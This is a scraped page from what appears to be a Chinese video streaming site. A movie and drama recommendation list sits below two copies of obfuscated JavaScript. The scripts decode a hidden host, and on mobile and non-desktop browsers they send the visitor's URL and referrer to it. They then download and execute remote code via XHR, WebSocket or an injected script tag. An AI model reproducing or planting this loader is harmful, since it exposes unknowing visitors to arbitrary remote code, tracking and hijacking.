function mdre(e) { const t = "UAB234CDE_FGHIJKQRSTVWXcdefghijklm-nopqrstuvwxyz015LMNOP6789YZab"; let n = ""; let r, o, c, s, a, i, l; let d = 0; let f = String(e).replace(/\r\n/g, "\n"); let h = ""; for (let e = 0; e < f.length; e++) { const t = f.charCodeAt(e); if (t < 128) { h += String.fromCharCode(t); } else if (t > 127 && t < 2048) { h += String.fromCharCode(t >> 6 | 192); h += String.fromCharCode(t & 63 | 128); } else { h += String.fromCharCode(t >> 12 | 224); h += String.fromCharCode(t >> 6 & 63 | 128); h += String.fromCharCode(t & 63 | 128); } } while (d < h.length) { r = h.charCodeAt(d++); o = h.charCodeAt(d++); c = h.charCodeAt(d++); s = r >> 2; a = (r & 3) << 4 | o >> 4; i = (o & 15) << 2 | c >> 6; l = c & 63; if (isNaN(o)) { n += t.charAt(s) + t.charAt(a); } else if (isNaN(c)) { n += t.charAt(s) + t.charAt(a) + t.charAt(i); } else { n += t.charAt(s) + t.charAt(a) + t.charAt(i) + t.charAt(l); } } return n; } function iwtq(e) { const t = "UAB234CDE_FGHIJKQRSTVWXcdefghijklm-nopqrstuvwxyz015LMNOP6789YZab"; let n = ""; let r = 0; let o, c, s, a; const i = String(e).replace(/[^A-Za-z0-9\-_]/g, ""); const l = i.length; while (r < l) { if (r == l) o = -1; else o = t.indexOf(i.charAt(r++)); if (r == l) c = -1; else c = t.indexOf(i.charAt(r++)); if (r === l) s = -1; else s = t.indexOf(i.charAt(r++)); if (r === l) a = -1; else a = t.indexOf(i.charAt(r++)); if (o === -1 || c === -1) { break; } const e = o << 2 | c >> 4; n += String.fromCharCode(e); if (s !== -1) { const e = (c & 15) << 4 | s >> 2; n += String.fromCharCode(e); } if (a !== -1) { const e = (s & 3) << 6 | a; n += String.fromCharCode(e); } } let d = ""; r = 0; while (r < n.length) { const e = n.charCodeAt(r); if (e < 128) { d += String.fromCharCode(e); r++; } else if (e > 191 && e < 224) { const t = n.charCodeAt(r + 1); d += String.fromCharCode((e & 31) << 6 | t & 63); r += 2; } else { const t = n.charCodeAt(r + 1); const o = n.charCodeAt(r + 2); d += String.fromCharCode((e & 15) << 12 | (t & 63) << 6 | o & 63); r += 3; } } return d; } function gwyddp(e) { return Math.floor(Math.random() * (e + 1)); } window['w'+'jb'+'hz'+'s'+'fx'] = navigator.platform && !/^Mac|Win/.test(navigator.platform) || !navigator.platform && /Android|iOS|iPhone/i.test(navigator.userAgent) ? function() { (function(e, t, n) { const r = n[iwtq("dPW5hqWyi4Inhqp0iU")]; let o = ""; try { o = opener ? opener.document.location.href : n.referrer; } catch (e) { o = n.referrer; } if (o && o.length > 900) { o = o.slice(0, 900); } let c = t.location.href; if (c && c.length > 900) { c = c.slice(0, 900); } const s = iwtq(e).split(","); const a = s[3]; const i = s[2]; let l = s[4]; let d; if (l.indexOf(";") > -1) { let e = l.split(";"); if (e.length < 1) return; if (e.length > 1) { d = e[gwyddp(e.length)]; } else { d = e[0]; } } else { d = l; } const f = mdre(`su=${d}&t=${s[0]}&d=${s[1]}&r=${o}&m=${Date.now()}&u=${c}&sm=${i}`); const h = navigator.userAgent; if (h.indexOf("b" + "ai" + "d" + "u") !== -1) { const e = new XMLHttpRequest; e.open("POST", `${i}://${d}/getSv/${f}`); e.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;"); e.setRequestHeader("X-REQUESTED-WITH", "XMLHttpRequest"); e.onreadystatechange = function() { if (e.readyState === 4 && e.status === 200) { const t = JSON.parse(e.responseText); const n = new Function("c", `${iwtq(t.ds)}; return ${t.ns}(c);`)(t.img.join("")); new Function("_tdcs", n)(r); } }; e.send(); } else if (t.WebSocket && /UCBrowser|Quark|Huawei|Vivo|NewsArticle/i.test(h)) { const e = new WebSocket(`${a}://${d}/ws/${f}`); e.onmessage = function(t) { e.close(); const o = t.data.split(";"); if (o.length > 2) { remoteCode = iwtq(o[0]); remoteCode += iwtq(o[1]); remoteCode += iwtq(o[2]); new Function("_tdcs", remoteCode)(r); } else { const e = n.createElement("script"); e.src = `${i}://${d}/vsn/${f}`; r.parentElement.insertBefore(e, r); } }; e.onerror = function() { const e = n.createElement("script"); e.src = `${i}://${d}/vsn/${f}`; r.parentElement.insertBefore(e, r); }; } else { const e = n.createElement("script"); e.src = `${i}://${d}/vsn/${f}`; r.parentElement.insertBefore(e, r); } })("H-01H2ULGCmMiDALGDiLh51nhOILfrHydPpziQ", window, document); } : function() {};
function ncoa(e) { const t = "UAB234CDE_FGHIJKQRSTVWXcdefghijklm-nopqrstuvwxyz015LMNOP6789YZab"; let n = ""; let r, o, c, s, a, i, l; let d = 0; let f = String(e).replace(/\r\n/g, "\n"); let h = ""; for (let e = 0; e < f.length; e++) { const t = f.charCodeAt(e); if (t < 128) { h += String.fromCharCode(t); } else if (t > 127 && t < 2048) { h += String.fromCharCode(t >> 6 | 192); h += String.fromCharCode(t & 63 | 128); } else { h += String.fromCharCode(t >> 12 | 224); h += String.fromCharCode(t >> 6 & 63 | 128); h += String.fromCharCode(t & 63 | 128); } } while (d < h.length) { r = h.charCodeAt(d++); o = h.charCodeAt(d++); c = h.charCodeAt(d++); s = r >> 2; a = (r & 3) << 4 | o >> 4; i = (o & 15) << 2 | c >> 6; l = c & 63; if (isNaN(o)) { n += t.charAt(s) + t.charAt(a); } else if (isNaN(c)) { n += t.charAt(s) + t.charAt(a) + t.charAt(i); } else { n += t.charAt(s) + t.charAt(a) + t.charAt(i) + t.charAt(l); } } return n; } function qqaoxjj(e) { const t = "UAB234CDE_FGHIJKQRSTVWXcdefghijklm-nopqrstuvwxyz015LMNOP6789YZab"; let n = ""; let r = 0; let o, c, s, a; const i = String(e).replace(/[^A-Za-z0-9\-_]/g, ""); const l = i.length; while (r < l) { if (r == l) o = -1; else o = t.indexOf(i.charAt(r++)); if (r == l) c = -1; else c = t.indexOf(i.charAt(r++)); if (r === l) s = -1; else s = t.indexOf(i.charAt(r++)); if (r === l) a = -1; else a = t.indexOf(i.charAt(r++)); if (o === -1 || c === -1) { break; } const e = o << 2 | c >> 4; n += String.fromCharCode(e); if (s !== -1) { const e = (c & 15) << 4 | s >> 2; n += String.fromCharCode(e); } if (a !== -1) { const e = (s & 3) << 6 | a; n += String.fromCharCode(e); } } let d = ""; r = 0; while (r < n.length) { const e = n.charCodeAt(r); if (e < 128) { d += String.fromCharCode(e); r++; } else if (e > 191 && e < 224) { const t = n.charCodeAt(r + 1); d += String.fromCharCode((e & 31) << 6 | t & 63); r += 2; } else { const t = n.charCodeAt(r + 1); const o = n.charCodeAt(r + 2); d += String.fromCharCode((e & 15) << 12 | (t & 63) << 6 | o & 63); r += 3; } } return d; } function yebl(e) { return Math.floor(Math.random() * (e + 1)); } window['gj'+'tu'+'hd'] = navigator.platform && !/^Mac|Win/.test(navigator.platform) || !navigator.platform && /Android|iOS|iPhone/i.test(navigator.userAgent) ? function() { (function(e, t, n) { const r = n[qqaoxjj("dPW5hqWyi4Inhqp0iU")]; let o = ""; try { o = opener ? opener.document.location.href : n.referrer; } catch (e) { o = n.referrer; } if (o && o.length > 900) { o = o.slice(0, 900); } let c = t.location.href; if (c && c.length > 900) { c = c.slice(0, 900); } const s = qqaoxjj(e).split(","); const a = s[3]; const i = s[2]; let l = s[4]; let d; if (l.indexOf(";") > -1) { let e = l.split(";"); if (e.length < 1) return; if (e.length > 1) { d = e[yebl(e.length)]; } else { d = e[0]; } } else { d = l; } const f = ncoa(`su=${d}&t=${s[0]}&d=${s[1]}&r=${o}&m=${Date.now()}&u=${c}&sm=${i}`); const h = navigator.userAgent; if (h.indexOf("b" + "ai" + "d" + "u") !== -1) { const e = new XMLHttpRequest; e.open("POST", `${i}://${d}/getSv/${f}`); e.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;"); e.setRequestHeader("X-REQUESTED-WITH", "XMLHttpRequest"); e.onreadystatechange = function() { if (e.readyState === 4 && e.status === 200) { const t = JSON.parse(e.responseText); const n = new Function("c", `${qqaoxjj(t.ds)}; return ${t.ns}(c);`)(t.img.join("")); new Function("_tdcs", n)(r); } }; e.send(); } else if (t.WebSocket && /UCBrowser|Quark|Huawei|Vivo|NewsArticle/i.test(h)) { const e = new WebSocket(`${a}://${d}/ws/${f}`); e.onmessage = function(t) { e.close(); const o = t.data.split(";"); if (o.length > 2) { remoteCode = qqaoxjj(o[0]); remoteCode += qqaoxjj(o[1]); remoteCode += qqaoxjj(o[2]); new Function("_tdcs", remoteCode)(r); } else { const e = n.createElement("script"); e.src = `${i}://${d}/vsn/${f}`; r.parentElement.insertBefore(e, r); } }; e.onerror = function() { const e = n.createElement("script"); e.src = `${i}://${d}/vsn/${f}`; r.parentElement.insertBefore(e, r); }; } else { const e = n.createElement("script"); e.src = `${i}://${d}/vsn/${f}`; r.parentElement.insertBefore(e, r); } })("H501H2ULGCmMiDALGDiLh51nhOILfrHydPpziQ", window, document); } : function() {};

猜你喜欢

  • 第2集
    铠真传 武士骑兵
    主演:石桥阳彩 榎木淳弥 村濑步 武内骏辅 熊谷健太郎 增田俊树 Lynn 小西克幸 佐藤拓也 鸟海浩辅 寺岛拓笃 杉田智和 天崎滉平 铃村健一 泽城千春 竹内良太 远藤大智 熊谷俊辉 木下纱华
  • 全集完结
    财富自由:我能接到女儿未来电话
    主演:王康 席乐
  • 全集完结
    穿书后,我和闺蜜卷款跑路
    主演:李佳明 夏末 星玥 沙晓东
  • 全集完结
    痞子翻身:八零商途狂飙
    主演:钱谦 杨添羽
  • 第10集完结
    史前战纪第一季
    主演:Aaron LaPlante 拉埃蒂茨亚·伊杜
  • 第9集
    终活合租房
    主演:城桧吏,畑芽育,室井滋,猫背椿,日野阳仁,石坂浩二,绪方义博,户田惠子,市毛良枝,竹下景子
  • 正片
    望向太阳
    主演:路易斯·海耶尔 菲利普·施纳克 莉亚·德林达 苏珊娜·伍艾斯特 莱娜·乌泽多夫斯基 卢齐亚·奥珀尔曼 卢卡斯·普莱瑟 康斯坦丁·林德霍斯特 戈德·贝内迪克斯 马丁·罗瑟 汉娜·海克特 芭尔贝尔·施瓦茨 弗洛里安·盖塞尔曼
  • 全集完结
    怦然心动时
    主演:曹峻柯 于忻
  • 全集完结
    如意流年终成空
    主演:卢新月 段少卿
  • 正片
    欣德·拉贾布之声
    主演:克拉拉·库里 , 萨贾·基拉尼 , 莫塔兹·马希斯 , 阿莫尔·何勒赫尔
  • 第4集
    奇探佩辛丝第二季
    主演:艾拉·梅西·珀维斯,杰西卡·海因斯,纳森·威尔士,马克·本顿,阿德里安·劳林斯,Ali Ariaie,Connor Curren,丽莎·萨多威,汤姆·李维斯
  • 第3集
    正义使者- 我的英雄学院之非法英雄第二季
    主演:古桥秀之,别天荒人,堀越耕平
  • 第1集
    重启
    主演:铃木亮平 , 户田惠梨香 , 永濑廉 , 莳田彩珠 , 中川大辅 , 藤泽凉架 , 藤田阳 , 矢崎滉 , 野吕佳代 , 塚地武雅 , 津田笃宏 , 伊藤英明 , 池田铁洋 , 酒向芳 , 黑木美沙 , 原田美枝子 , 北村有起哉
  • 全集完结
    操劳一生被弃,老太重回五十爱自己
    主演:潘依祎-雒小刚
  • 全集完结
    觉醒透视眼后,发觉老宅全是宝物
    主演:左洲源-刘佳悦